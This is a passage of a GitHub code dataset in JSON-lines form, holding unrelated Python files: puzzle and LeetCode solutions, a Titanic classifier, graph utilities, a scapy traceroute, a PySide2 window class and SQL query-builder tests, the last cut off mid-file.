+{"seq_id":"43161930516","text":"\n\nwith open(\"input.txt\") as file:\n lines = file.read().split(\"\\n\")\n\nbuses = [num for num in lines[1].split(\",\")]\n\noffsets = {}\nfor i,bus in enumerate(buses):\n if bus != \"x\":\n offsets[int(bus)] = i\n\n# Brute-force solution\n# Cannot solve puzzle input, but does solve all test cases\nt = 0\nwhile True:\n valid = True\n for bus,offset in offsets.items():\n if (t + offset) % bus != 0:\n valid = False\n break\n if valid:\n break\n t += 1\nprint(t)\n\n","repo_name":"JoshW-7/AdventOfCode","sub_path":"2020/Day 13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86510291105","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import matplotlib\r\nimport seaborn as sns\r\n\r\nplt.rc(\"font\",family='Arial Unicode MS')\r\n\r\n#读取train的数据\r\ntrain_data=pd.read_csv(r\"E:\\titanic\\train.csv\",header=[0])\r\nprint(train_data.head())\r\n\r\n#读取test的数据\r\ntest_data=pd.read_csv(r\"E:\\titanic\\test.csv\",header=[0])\r\nprint(test_data.head())\r\n\r\n#查看train和test的基本信息\r\nprint(train_data.info())\r\nprint(test_data.info())\r\n\r\n#查看train和test数据列不同值的数量\r\nprint(train_data.nunique())\r\nprint(test_data.nunique())\r\n\r\n#删除不需要的列Ticket\r\ntnd=train_data.drop(['Ticket'],axis=1,inplace=True)\r\nprint(tnd)\r\ntd=test_data.drop(['Ticket'],axis=1,inplace=True)\r\nprint(td)\r\n\r\n#统计生存者的数量\r\npd1=pd.DataFrame(train_data.Survived.value_counts(normalize=True)*100)\r\nprint(pd1)\r\ntrain_data.Survived.value_counts().plot(kind='bar',xlabel='生存情况',ylabel='人数',width=0.4,color='g',alpha=0.6)\r\n\r\n#统计男女年龄数\r\npd2=pd.DataFrame(train_data.Sex.value_counts())\r\nprint(pd2)\r\n\r\n#统计生存概率\r\npd0=pd.DataFrame(train_data.Survived.value_counts(normalize=True)*100)\r\nprint(pd0)\r\n\r\n#统计男女生存概率\r\npd3=pd.DataFrame(train_data.groupby(['Sex'])['Survived'].value_counts(normalize=True)*100)\r\nprint(pd3)\r\npd.crosstab(train_data.Sex,train_data.Survived).plot(kind='bar',ylabel='人数',width=0.4,color=['g','y'],alpha=0.6)\r\n\r\n#统计经济地位阶层生存情况\r\npd4=pd.DataFrame(train_data.groupby(['Pclass'])['Survived'].value_counts(normalize=True)*100)\r\nprint(pd4)\r\npd.crosstab(train_data.Pclass,train_data.Survived).plot(kind='bar',ylabel='人数',width=0.4,color=['g','y'],alpha=0.6)\r\n\r\n#统计经济地位阶层性别生存情况\r\npd5=pd.DataFrame(train_data.groupby(['Pclass'])['Sex'].value_counts())\r\nprint(pd5)\r\n\r\n#统计各登船港口的人数\r\ntrain_data.Embarked.value_counts().plot(kind='line',xlabel='Starting Point',ylabel='人数',color='b',alpha=0.6,linestyle='--')\r\n\r\n#统计各登船港口生存/死亡人数\r\npd.crosstab(train_data.Survived,train_data.Embarked).plot(kind='bar',xlabel='Survived',ylabel='人数',width=0.4,color=['g','y','c'],alpha=0.6)\r\n\r\n#统计各登船港口性别生存/死亡数量\r\npd6=pd.DataFrame(train_data.groupby(['Embarked','Sex'])['Survived'].value_counts())\r\nprint(pd6)\r\n\r\n#统计各列数据为空的总数\r\nprint(train_data.isna().sum())\r\nprint(test_data.isna().sum())\r\n\r\n#填充缺失值\r\ntrain_data.Embarked.fillna('S',inplace=True)\r\nprint(train_data.isna().sum())\r\n\r\n#填充Fare的缺失值\r\nprint(test_data.groupby(['Embarked','Pclass'])['Fare'].describe())\r\n\r\nprint(test_data[test_data['Fare'].isna()])\r\n\r\ntest_data.Fare.fillna(test_data[(test_data['Pclass']==3)&(test_data['Embarked']=='S')].Fare.median(),inplace=True)\r\nprint(test_data.isna().sum())\r\n\r\n#填充Cabin的缺失值\r\ntrain_Fare_Grp=pd.qcut(train_data.Fare,q=4,labels=['Economy','Economy 
Plus','Business','First'])\r\ntrain_data['Fare_Gp']=train_Fare_Grp\r\nprint(train_data.head())\r\n\r\ntest_Fare_Grp=pd.qcut(test_data.Fare,q=4,labels=['Economy','Economy Plus','Business','First'])\r\ntest_data['Fare_Gp']=test_Fare_Grp\r\nprint(test_data.head())\r\n\r\ndef cabin_fill(df):\r\n    for i in range(len(df)):\r\n        if(df['Cabin'].isna()[i]):\r\n            fgp=df.iloc[i,:]['Fare_Gp']\r\n            pcl=df.iloc[i,:]['Pclass']\r\n            val=df[(df['Fare_Gp']==fgp)|(df['Pclass']==pcl)].Cabin.mode().values[0]\r\n            df['Cabin'].iloc[i]=val\r\n    return (df)\r\n\r\ncabin_fill(train_data)\r\nprint(train_data.isna().sum())\r\n\r\ncabin_fill(test_data)\r\nprint(test_data.isna().sum())\r\n\r\n\r\ndef title(df):\r\n    title=[]\r\n    for i in range(len(df)):\r\n        tokens=df.iloc[i,:]['Name'].split(',')\r\n        title.append(tokens[1].split(' ')[1])\r\n    df['Title']=title\r\n    return (df)\r\n\r\ntitle(train_data)\r\nprint(train_data.head())\r\n\r\ntitle(test_data)\r\nprint(test_data.head())\r\n\r\ntdg=train_data.groupby(['Title','Sex'])['Age'].describe()\r\nprint(tdg)\r\n\r\ntdg2=test_data.groupby(['Title','Sex'])['Age'].describe()\r\nprint(tdg2)\r\n\r\nprint(train_data.Title.value_counts())\r\n\r\ntrain_data.Title.replace(['Mlle.','Mme.','Ms.','Major.','Lady.','Jonkheer.',\r\n                          'Col.','Rev.','Capt.','Sir.','Don.','the','Dr.'],\r\n                         ['Miss.','Miss.','Mrs.','Other','Mrs.','Mr.','Other',\r\n                          'Other','Other','Other','Mr.','Mrs.','Other'],inplace=True)\r\nprint(train_data.Title.value_counts())\r\nprint(test_data.Title.value_counts())\r\n\r\ntest_data.Title.replace(['Col.','Rev.','Ms.','Dona.','Dr.'],\r\n                        ['Other','Other','Miss.','Mrs.','Other'],inplace=True)\r\nprint(test_data.Title.value_counts())\r\n\r\ndef age_fill(df):\r\n    for i in range(len(df)):\r\n        if(np.isnan(df.iloc[i,:]['Age'])==True):\r\n            ttl=df.iloc[i,:]['Title']\r\n            val=df[(df['Title']==ttl)].Age.median()\r\n            df['Age'].iloc[i]=val\r\n    return (df)\r\n\r\nage_fill(train_data)\r\nprint(train_data.isna().sum())\r\nage_fill(test_data)\r\nprint(test_data.isna().sum())\r\n\r\nprint(train_data.head())\r\n\r\ntrain_data.drop(['Name','Fare_Gp','Title'],axis=1,inplace=True)\r\nprint(train_data.head())\r\ntest_data.drop(['Name','Fare_Gp','Title'],axis=1,inplace=True)\r\nprint(test_data.head())\r\n\r\ny=train_data.Survived\r\ntrain_data.drop(['Survived'],axis=1,inplace=True)\r\nprint(train_data.head())\r\n\r\ndata=pd.concat([train_data,test_data],axis=0)\r\nprint(data.shape)\r\n\r\ndata=pd.get_dummies(data,drop_first=True)\r\nprint(data.head())\r\n\r\ntrain_data=data[data['PassengerId']<892]\r\nprint(train_data.head())\r\ntest_data=data[data['PassengerId']>=892] # >= keeps PassengerId 892, the first test-set row\r\nprint(test_data.head())\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nscaler=StandardScaler()\r\ntrain_scaled=scaler.fit_transform(train_data)\r\ntest_scaled=scaler.transform(test_data) # reuse the scaler fitted on the training split\r\n\r\nprint(train_scaled.shape,test_scaled.shape)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nx_train,x_test,y_train,y_test=train_test_split(train_scaled,y,test_size=0.2)\r\nprint(x_train.shape,x_test.shape)\r\n\r\nprint(y_train)\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import BernoulliNB\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import 
StratifiedKFold\r\n\r\n#逻辑回归\r\nskf=StratifiedKFold(n_splits=5,shuffle=True)\r\nlogmod_scores=cross_val_score(LogisticRegression(solver='liblinear'),train_scaled,y,cv=skf)\r\nprint(logmod_scores.mean())\r\n\r\nlogmod=LogisticRegression(solver='liblinear')\r\nlogmod.fit(x_train,y_train)\r\nypred_logmod=logmod.predict(x_test)\r\ncm_log=confusion_matrix(y_test,ypred_logmod)\r\nsns.heatmap(cm_log,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_logmod))\r\n\r\n#SVM\r\nsvm_scores=cross_val_score(SVC(C=150,kernel='linear'),train_data,y,cv=3)\r\nprint(svm_scores.mean())\r\n\r\nsvmod=SVC(C=150,kernel='linear')\r\nsvmod.fit(x_train,y_train)\r\nypred_svmod=svmod.predict(x_test)\r\ncm_svm=confusion_matrix(y_test,ypred_svmod)\r\nsns.heatmap(cm_svm,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_svmod))\r\n\r\n#Decision Tree\r\ndectre_score=cross_val_score(DecisionTreeClassifier(),train_scaled,y,cv=skf)\r\nprint(dectre_score.mean())\r\n\r\ndectre_mod=DecisionTreeClassifier()\r\ndectre_mod.fit(x_train,y_train)\r\nypred_dectre=dectre_mod.predict(x_test)\r\ncm_dectre=confusion_matrix(y_test,ypred_dectre)\r\nsns.heatmap(cm_dectre,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_dectre))\r\n\r\n#Random Forest\r\nrf_scores=cross_val_score(RandomForestClassifier(criterion='gini'),train_scaled,y,cv=skf)\r\nprint(rf_scores.mean())\r\n\r\nrfmod=RandomForestClassifier()\r\nrfmod.fit(x_train,y_train)\r\nypred_rfmod=rfmod.predict(x_test)\r\ncm_rf=confusion_matrix(y_test,ypred_rfmod)\r\nsns.heatmap(cm_rf,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_rfmod))\r\n\r\n#Bernoulli NB\r\nnbmod_scores=cross_val_score(BernoulliNB(),train_scaled,y,cv=skf)\r\nprint(nbmod_scores.mean())\r\n\r\nnbmod=BernoulliNB()\r\nnbmod.fit(x_train,y_train)\r\nypred_nb=nbmod.predict(x_test)\r\ncm_nb=confusion_matrix(y_test,ypred_nb)\r\nsns.heatmap(cm_nb,annot=True,cmap='Blues')\r\nplt.xlabel('真实值')\r\nplt.ylabel('预测值')\r\n\r\nprint(classification_report(y_test, ypred_nb))\r\n\r\n#Submission\r\nmodel=RandomForestClassifier(criterion='gini')\r\nmodel.fit(train_scaled,y)\r\nypred_rf=model.predict(test_scaled)\r\npath=pd.DataFrame({'PassengerId':data.PassengerId[891:],'Survived':ypred_rf})\r\nprint(path.to_csv(r'E:\\titanic\\Submission.csv',index=False))\r\n","repo_name":"rgyfmm/machinelearning","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22607355472","text":"from pathlib import Path\nimport scipy.sparse as sp\nimport numpy as np\nimport torch\nfrom typing import *\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1)) # 对每一行求和\n r_inv = np.power(rowsum, -1).flatten() # 求倒数\n r_inv[np.isinf(r_inv)] = 0. 
# 如果某一行全为0,则r_inv算出来会等于无穷大,将这些行的r_inv置为0\n r_mat_inv = sp.diags(r_inv) # 构建对角元素为r_inv的对角矩阵\n mx = r_mat_inv.dot(mx)\n # 用对角矩阵与原始矩阵的点积起到标准化的作用,原始矩阵中每一行元素都会与对应的r_inv相乘,最终相当于除以了sum\n return mx\n\n\ndef normalize_np(mx: np.ndarray) -> np.ndarray:\n # 对每一行进行归一化\n rows_sum = np.array(mx.sum(1)).astype('float') # 对每一行求和\n rows_inv = np.power(rows_sum, -1).flatten() # 求倒数\n rows_inv[np.isinf(rows_inv)] = 0 # 如果某一行全为0,则r_inv算出来会等于无穷大,将这些行的r_inv置为0\n # rows_inv = np.sqrt(rows_inv)\n rows_mat_inv = np.diag(rows_inv) # 构建对角元素为r_inv的对角矩阵\n mx = rows_mat_inv.dot(mx) # .dot(cols_mat_inv)\n return mx\n\n\ndef load_prepared_data(dataset='cora'):\n # sp.save_npz('{}_adj.npz'.format(dataset), adj)\n # sp.save_npz('{}_features.npz'.format(dataset), features)\n # # sp.save_npz('{}_labels.npz'.format(dataset),save_labels)\n # np.save('{}_labels.npy'.format(dataset), save_labels)\n print('Loading {} dataset'.format(dataset))\n path = Path(__file__).parent / 'data'\n labels = np.load(path / '{}_labels.npy'.format(dataset))\n adj = sp.load_npz(path / '{}_adj.npz'.format(dataset))\n adj = normalize(adj + sp.eye(adj.shape[0])) # eye创建单位矩阵,第一个参数为行数,第二个为列数\n # adj = normalize(adj)\n labels = torch.LongTensor(labels)\n adj = torch.FloatTensor(adj.todense())\n print('finish loading')\n if dataset in {'BlogCatalog', 'citeseer', 'cora', 'Flickr', 'pubmed'}:\n features = sp.load_npz(path / '{}_features.npz'.format(dataset))\n features = normalize(features)\n features = torch.FloatTensor(np.array(features.todense()))\n else:\n features = torch.FloatTensor(np.diag(np.ones(labels.shape[0])))\n return adj, features, labels\n\n\ndef load_ripple_data(dataset='cora'):\n print('Loading {} dataset'.format(dataset))\n path = Path(__file__).parent / 'data'\n labels = np.load(path / '{}_labels.npy'.format(dataset))\n ripple = sp.load_npz(path / '{}_ripple.npz'.format(dataset))\n ripple = normalize(ripple + sp.eye(ripple.shape[0])) # eye创建单位矩阵,第一个参数为行数,第二个为列数\n # adj = normalize(adj)\n labels = torch.LongTensor(labels)\n ripple = torch.FloatTensor(ripple.todense())\n print('finish loading')\n if dataset in {'BlogCatalog', 'citeseer', 'cora', 'Flickr', 'pubmed'}:\n features = sp.load_npz(path / '{}_features.npz'.format(dataset))\n features = normalize(features)\n features = torch.FloatTensor(np.array(features.todense()))\n else:\n features = torch.FloatTensor(np.diag(np.ones(labels.shape[0])))\n return ripple, features, labels\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels) # 使用type_as(tesnor)将张量转换为给定类型的张量。\n correct = preds.eq(labels).double() # 记录等于preds的label eq:equal\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sampling(src_nodes: torch.TensorType, sample_num, neighbor_table):\n \"\"\"根据源节点采样指定数量的邻居节点,注意使用的是有放回的采样;\n 某个节点的邻居节点数量少于采样数量时,采样结果出现重复的节点\n 在src_nodes中每个节点都采样,采样sample_num个\n Arguments:\n src_nodes {Tensor} -- 源节点列表\n sample_num {int} -- 需要采样的节点数\n neighbor_table {dict} -- 节点到其邻居节点的映射表\n Returns:\n np.ndarray -- 采样结果构成的列表\n \"\"\"\n results = []\n for i in range(src_nodes.shape[0]):\n sid = src_nodes[i].item()\n # 从节点的邻居中进行有放回地进行采样\n # print(sid)\n # print(len(neighbor_table[500]))\n # if len(neighbor_table[sid])==0:\n # print('sid:{}'.format(sid))\n # print('neighbor:{}'.format(neighbor_table[sid]))\n res = np.random.choice(neighbor_table[sid], size=(sample_num,))\n results.append(res)\n return torch.from_numpy(np.asarray(results).flatten())\n\n\ndef multihop_sampling(src_nodes: torch.TensorType, sample_nums, neighbor_table) -> List[torch.TensorType]:\n \"\"\"根据源节点进行多阶采样\n 
Arguments:\n src_nodes {list, np.ndarray} -- 源节点id\n sample_nums {list of int} -- 每一阶需要采样的个数\n neighbor_table {dict} -- 节点到其邻居节点的映射\n\n Returns:\n [list of ndarray] -- 每一阶采样的结果\n \"\"\"\n sampling_result = [src_nodes]\n for k, hopk_num in enumerate(sample_nums):\n hopk_result = sampling(sampling_result[k], hopk_num, neighbor_table)\n sampling_result.append(hopk_result)\n return sampling_result\n","repo_name":"Xiaoctw/GraphEmbedding","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6286361508","text":"from scapy.all import *\nfrom scapy.layers.inet import IP, ICMP\nfrom ipwhois.ipwhois import IPWhois\nimport multiprocessing\n\n\ndef whois(ip):\n try:\n whois_obj = IPWhois(ip)\n results = whois_obj.lookup_rdap(depth=1)\n return results[\"asn_description\"] + \" - \" + \\\n results[\"network\"][\"remarks\"][0][\"description\"]\n except Exception:\n return \"\"\n\n\ndef send_packet_and_get_reply(pck, ttl, is_end):\n reply = sr1(pck, verbose=0) # ip <- ICMP - reply.payload\n if reply is None:\n is_end.value = 1\n ip = reply.src\n print(f\"{ttl}: {ip}: {whois(ip)}\")\n if reply.payload.type == 0:\n is_end.value = 1\n else:\n is_end.value = 0\n\n\ndef trace_route(hostname):\n for i in range(1, 31):\n pck = IP(dst=hostname, ttl=i) / ICMP()\n ret_value = multiprocessing.Value(\"i\", 0, lock=False)\n process = multiprocessing.Process(\n target=send_packet_and_get_reply, args=(pck, i, ret_value))\n process.start()\n process.join(60)\n if process.is_alive():\n print(\"* * *\")\n process.terminate()\n break\n else:\n if ret_value.value == 1:\n break\n\n\nif __name__ == \"__main__\":\n try:\n trace_route(input())\n except OSError as error:\n print(\"Please, check your internet connection \"\n \"or try use script as administrator\")\n","repo_name":"bkmz1840/Protocols","sub_path":"First theme/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71559909229","text":"import sys\nimport logging\n\nfrom PySide2.QtWidgets import (\n QMainWindow,\n QDockWidget,\n QMdiArea,\n QMdiSubWindow,\n )\n\nfrom PySide2.QtCore import Qt\n\nfrom components import ComponentGuiConstructor\n\n\nclass GeoMainWindow(QMainWindow):\n\n _initialized = False\n _instance = None\n\n def __init__(self):\n if not GeoMainWindow._initialized:\n super().__init__()\n GeoMainWindow._initialized = True\n\n self.mdi_area = QMdiArea()\n self.setCentralWidget(self.mdi_area)\n\n def __new__(cls):\n \"\"\" Singleton \"\"\"\n if GeoMainWindow._instance is None:\n GeoMainWindow._instance = super().__new__(cls)\n return GeoMainWindow._instance\n\n\n\n def addToCentral(self, widget, title = \"\"):\n gamma_logger = logging.getLogger(\"gamma_logger\")\n\n gamma_logger.debug(\"Adding to central : {}\".format(widget))\n if widget:\n sub_window = self.mdi_area.addSubWindow(widget)\n sub_window.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose);\n sub_window.setWindowTitle(title)\n sub_window.showMaximized()\n\n def addMenu(self, menu):\n if menu:\n self.menuBar().addMenu(menu)\n\n\n def addDockindWidget(self, widget, widget_area):\n if widget:\n dock_widget = QDockWidget()\n dock_widget.setWindowTitle(widget.windowTitle())\n dock_widget.setWidget(widget)\n self.addDockWidget(widget_area, dock_widget)\n\n\n\n\ndef initialize_component():\n GeoMainWindow().setWindowTitle(\"Petrophysics\")\n 
GeoMainWindow().show()\n # GeoMainWindow().showMaximized()\n\nif not 'unittest' in sys.modules.keys():\n initialize_component()\n","repo_name":"iGeophysix/gamma","sub_path":"components/mainwindow/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24547012150","text":"contatos = {\n \"henrique@gmail.com\": {\"nome\": \"Henrique\", \"telefone\": \"3333-2221\"},\n \"giovanna@gmail.com\": {\"nome\": \"Giovanna\", \"telefone\": \"3443-2121\"},\n \"chappie@gmail.com\": {\"nome\": \"Chappie\", \"telefone\": \"3344-9871\"},\n \"melaine@gmail.com\": {\"nome\": \"Melaine\", \"telefone\": \"3333-7766\"},\n}\n\nteste = \"henrique@gmail.com\" in contatos # True\nprint(teste)\n\nteste = \"megui@gmail.com\" in contatos # False\nprint(teste)\n\nteste = \"idade\" in contatos[\"henrique@gmail.com\"] # False\nprint(teste)\n\nteste = \"telefone\" in contatos[\"giovanna@gmail.com\"] # True\nprint(teste)","repo_name":"henrique-sk/Ciencia_de_Dados-DIO-Geracao_Tech_Unimed_BH","sub_path":"02 - Python para Cientistas de Dados/07 - Estrutura de dados/04-Dicionarios/15_in.py","file_name":"15_in.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24107786195","text":"from binary_tree import create_btree_with_list\nfrom collections import deque\n\n\nclass Solution:\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n \n \"\"\"\n 2 Steps:\n 1. Since the problem want a DFS way to print the tree\n we shall first use a recursive function to save each \n nodes into a stack(a first come last out array)\n 2. 
Next,use a BFS way to write each level of the tree, \n each time, pop out the 1st element as the right node's value\n and come to the next level calling the writing function itself.\n \"\"\"\n if root:\n result_stack = deque()\n self.dfs_tree_to_stack(root, result_stack)\n #return(result_stack)\n result_stack.popleft()\n self.stack_2_tree(root, result_stack)\n #return(root)\n \n\n\n \n \"\"\"\n dfs_tree_to_array function takes a tree's root,\n and export an array recording the node's value \n from top to leaf, left to right\n \"\"\"\n def dfs_tree_to_array(self, root, result):\n # result as global variable\n if not root:\n return(result)\n result.append(root.value)\n if root.left:\n result = self.dfs_tree_to_array(root.left, result) \n if root.right:\n result = self.dfs_tree_to_array(root.right, result) \n return(result)\n \"\"\"\n The biggest problem of this solution is that, it skip\n the empty nodes in the tree, meaning that with the output \n list, cannot re-create the tree.\n \"\"\"\n\n def dfs_tree_to_array_II(self, root, result):\n # How to not skip a empty child node but does not\n # influence when both child nodes are empty(leaf)\n if not root:\n return(result.append(None))\n\n result.append(root.value)\n\n if not root.left and not root.right:\n return(result)\n \n self.dfs_tree_to_array_II(root.left, result)\n self.dfs_tree_to_array_II(root.right,result)\n\n \n \"\"\"\n do not use :\n\n ```\n try:\n result = self.dfs_tree_to_array_II(root.left, result)\n result = self.dfs_tree_to_array_II(root.right,result)\n except:\n print(root) # 5 -> 6\n print(result) # None\n ```\n\n it will stuck at [1,2,3,4,5,None]\n because after running\n result = self.dfs_tree_to_array_II(root.left, result)\n result will be None rather than [1,2,3,4,5],\n and by running the next statement:\n result = self.dfs_tree_to_array_II(root.right, result)\n It will not allow you to append root.right to result which is None\n \"\"\"\n return(result)\n\n \"\"\"\n Inplace Operation:\n hat is an operation that modifies the object and returns nothing\n \"\"\"\n # Skip Empty Child Nodes\n def dfs_tree_to_stack(self, root, result_stack):\n\n if not root:\n return(result_stack)\n #pass\n result_stack.append(root)\n if root.left:\n self.dfs_tree_to_stack(root.left, result_stack) \n if root.right:\n self.dfs_tree_to_stack(root.right, result_stack)\n return(result_stack)\n\n # Keep record of Empty Child Nodes\n def dfs_tree_to_stack_II(self, root, result_stack):\n if not root:\n return(result_stack.append(None))\n\n result_stack.append(root)\n\n if not root.left and not root.right:\n return(result_stack)\n\n self.dfs_tree_to_stack_II(root.left, result_stack)\n self.dfs_tree_to_stack_II(root.right, result_stack)\n return(result_stack)\n\n def stack_2_tree(self, root, result_stack):\n if result_stack:\n root.left = None\n root.right = result_stack.popleft()\n self.stack_2_tree(root.right, result_stack)\n else:\n return(root)\n\n\n \n\n\ndata = [1,2,5,3,4,None,6]\ntree = create_btree_with_list(data)\nprint(tree)\ns = Solution()\ns.flatten(tree)\nprint(tree)\n\n ","repo_name":"ChenjiahuiLi/Python-for-Everybody","sub_path":"Leetcode/leetcode_114_flatten_binary_tree_to_linked_list.py","file_name":"leetcode_114_flatten_binary_tree_to_linked_list.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33757722886","text":"#must run using python3 command eg. 
\"python3 pandasAttempt.py\"\n\nimport os, csv, pandas, sys\n\npath=os.getcwd()\n# make list of all files in directory\nallFiles = os.listdir(path)\n\nfor dataFile in allFiles:\n # rename xls extension to csv\n base_file, ext = os.path.splitext(dataFile)\n if ext == \".xls\":\n os.rename(dataFile, base_file + \".csv\")\n print(dataFile)\n\n# declare empty list for csv files\ncsvFiles = []\n# redefine allFiles variable to include newly renamed files\nallFiles = os.listdir(path)\n# add file to csvFiles list\nfor csvFile in allFiles:\n base_file, ext = os.path.splitext(csvFile)\n if ext == \".csv\":\n csvFiles.append(csvFile)\n # print(csvFile)\n\n\n# print number of csv files in directory\nprint(str(len(csvFiles)) + \" csv files\")\n\nfor csvFile in csvFiles:\n standings = pandas.read_csv(csvFile, sep='/t', header=None, engine='python')\n# modStandings = standings.replace(\"⋯\", \"-\", regex=True)\n# modStandings.to_csv('new/'+csvFile, index=False)\n\n # for row in standings.itertuples(index=True, name='Pandas'):\n # if standings[row][0].startswith(\"Standings\"):\n # print(\"booya\")\n\n for row in standings:\n if standings[row][0].startswith(\"Standings\"):\n print(\"Found it\")\n\n # select first two rows\n # test = standings.head(n=2)\n # # test2 = test.iloc[0]\n # print(\"*****************************\")\n # # if test.iloc[0].str.startswith('Standings'):\n # # print(\"found it\")\n # # print(test2)\n # print(standings.columns)\n # print(\"*****************************\")\n # if standings.index[0].str.startswith(\"Standings\"):\n # print(\"Booya\")\n\n# using python csv module\n# might have to use this to drop rows because pandas only allows referring to rows by index for rows after what it interprets as header\n# for csvFile in csvFiles:\n# with open(csvFile, newline='') as f:\n# for line in f:\n# if line.startswith(\"Standings\"):\n# print(\"Found it\")\n\n","repo_name":"tpups/wfbc_utils","sub_path":"old/pandasAttempt.py","file_name":"pandasAttempt.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41167510648","text":"from __future__ import annotations\nfrom db_chat.sql_builder.Filter import Filter\nfrom db_chat.sql_builder.FilterOperator import FilterOperator\nfrom db_chat.sql_builder.Query import Query, Expression\n\nfrom db_chat.sql_builder.sqlalchemy_query_builder import Column, SQLAlchemyQueryBuilder, Schema, Table\nfrom db_chat.sql_builder.mappings import Relationship\n\n\nschema: Schema = Schema(\n tables={\n \"users\": Table(\n name=\"users\",\n friendly_name=\"users\",\n columns=[\n Column(name=\"name\", friendly_name=\"name\"),\n Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"email\", friendly_name=\"email\"),\n Column(name=\"posts\", friendly_name=\"posts\", relationships=[\"post_user\"]),\n ],\n ),\n \"posts\": Table(\n name=\"posts\",\n friendly_name=\"posts\",\n columns=[\n Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"user_id\", friendly_name=\"user_id\"),\n Column(name=\"title\", friendly_name=\"title\"),\n Column(name=\"body\", friendly_name=\"body\"),\n Column(name=\"likes\", friendly_name=\"likes\"),\n Column(name=\"user_name\", friendly_name=\"user name\", relationships=[\"post_user\"], related_field=\"name\"),\n Column(\n name=\"user_email\", friendly_name=\"user email\", relationships=[\"post_user\"], related_field=\"email\"\n ),\n ],\n ),\n \"comments\": Table(\n name=\"comments\",\n friendly_name=\"comments\",\n columns=[\n 
Column(name=\"id\", friendly_name=\"id\"),\n Column(name=\"post_id\", friendly_name=\"post_id\"),\n Column(name=\"body\", friendly_name=\"body\"),\n Column(\n name=\"comment_user_name\",\n friendly_name=\"user name\",\n relationships=[\"post_comments\", \"post_user\"],\n related_field=\"name\",\n ),\n ],\n ),\n },\n relationships=[\n Relationship(name=\"post_user\", table1=\"posts\", field1=\"user_id\", table2=\"users\", field2=\"id\"),\n Relationship(name=\"post_comments\", table1=\"posts\", field1=\"id\", table2=\"comments\", field2=\"post_id\"),\n ],\n)\n\nbuilder = SQLAlchemyQueryBuilder(schema)\n\n\ndef test_simple():\n \"\"\"\n Simple query\n \"\"\"\n\n query = Query(\n table=\"users\",\n fields=[\"name\", \"email\"],\n filters=[],\n sort=[\"name\"],\n limit=10,\n offset=10,\n )\n\n Sql = builder.build_query(query=query)\n assert Sql == \"SELECT users.name, users.email \\nFROM users\"\n\n\ndef test_simple_join():\n \"\"\"\n Simple join\n \"\"\"\n\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\"],\n )\n\n Sql = builder.build_query(query=query)\n assert (\n Sql\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id\"\n )\n\n\ndef test_join_with_multiple_fields():\n \"\"\"\n simple join with multiple fields\n \"\"\"\n\n query = Query(\n table=\"posts\",\n fields=[\"title\", \"body\", \"user_name\", \"user_email\"],\n )\n S = builder.build_query(query=query)\n assert (\n S\n == \"SELECT posts.title, posts.body, posts_post_user.name AS user_name, posts_post_user.email AS user_email \\nFROM posts JOIN users AS posts_post_user ON posts.user_id = posts_post_user.id\"\n )\n\n\ndef test_two_level_join():\n \"\"\"\n Two level join\n \"\"\"\n\n query = Query(\n table=\"comments\",\n fields=[\"body\", \"comment_user_name\"],\n filters=[],\n sort=[\"title\"],\n limit=10,\n offset=10,\n )\n\n Sql = builder.build_query(query=query)\n assert (\n Sql\n == \"SELECT comments.body, comments_post_comments_post_user.name AS comment_user_name \\nFROM comments JOIN posts AS comments_post_comments ON comments.post_id = comments_post_comments.id JOIN users AS comments_post_comments_post_user ON comments_post_comments.user_id = comments_post_comments_post_user.id\"\n )\n\n\ndef test_simple_filter():\n \"\"\"\n Simple filter\n 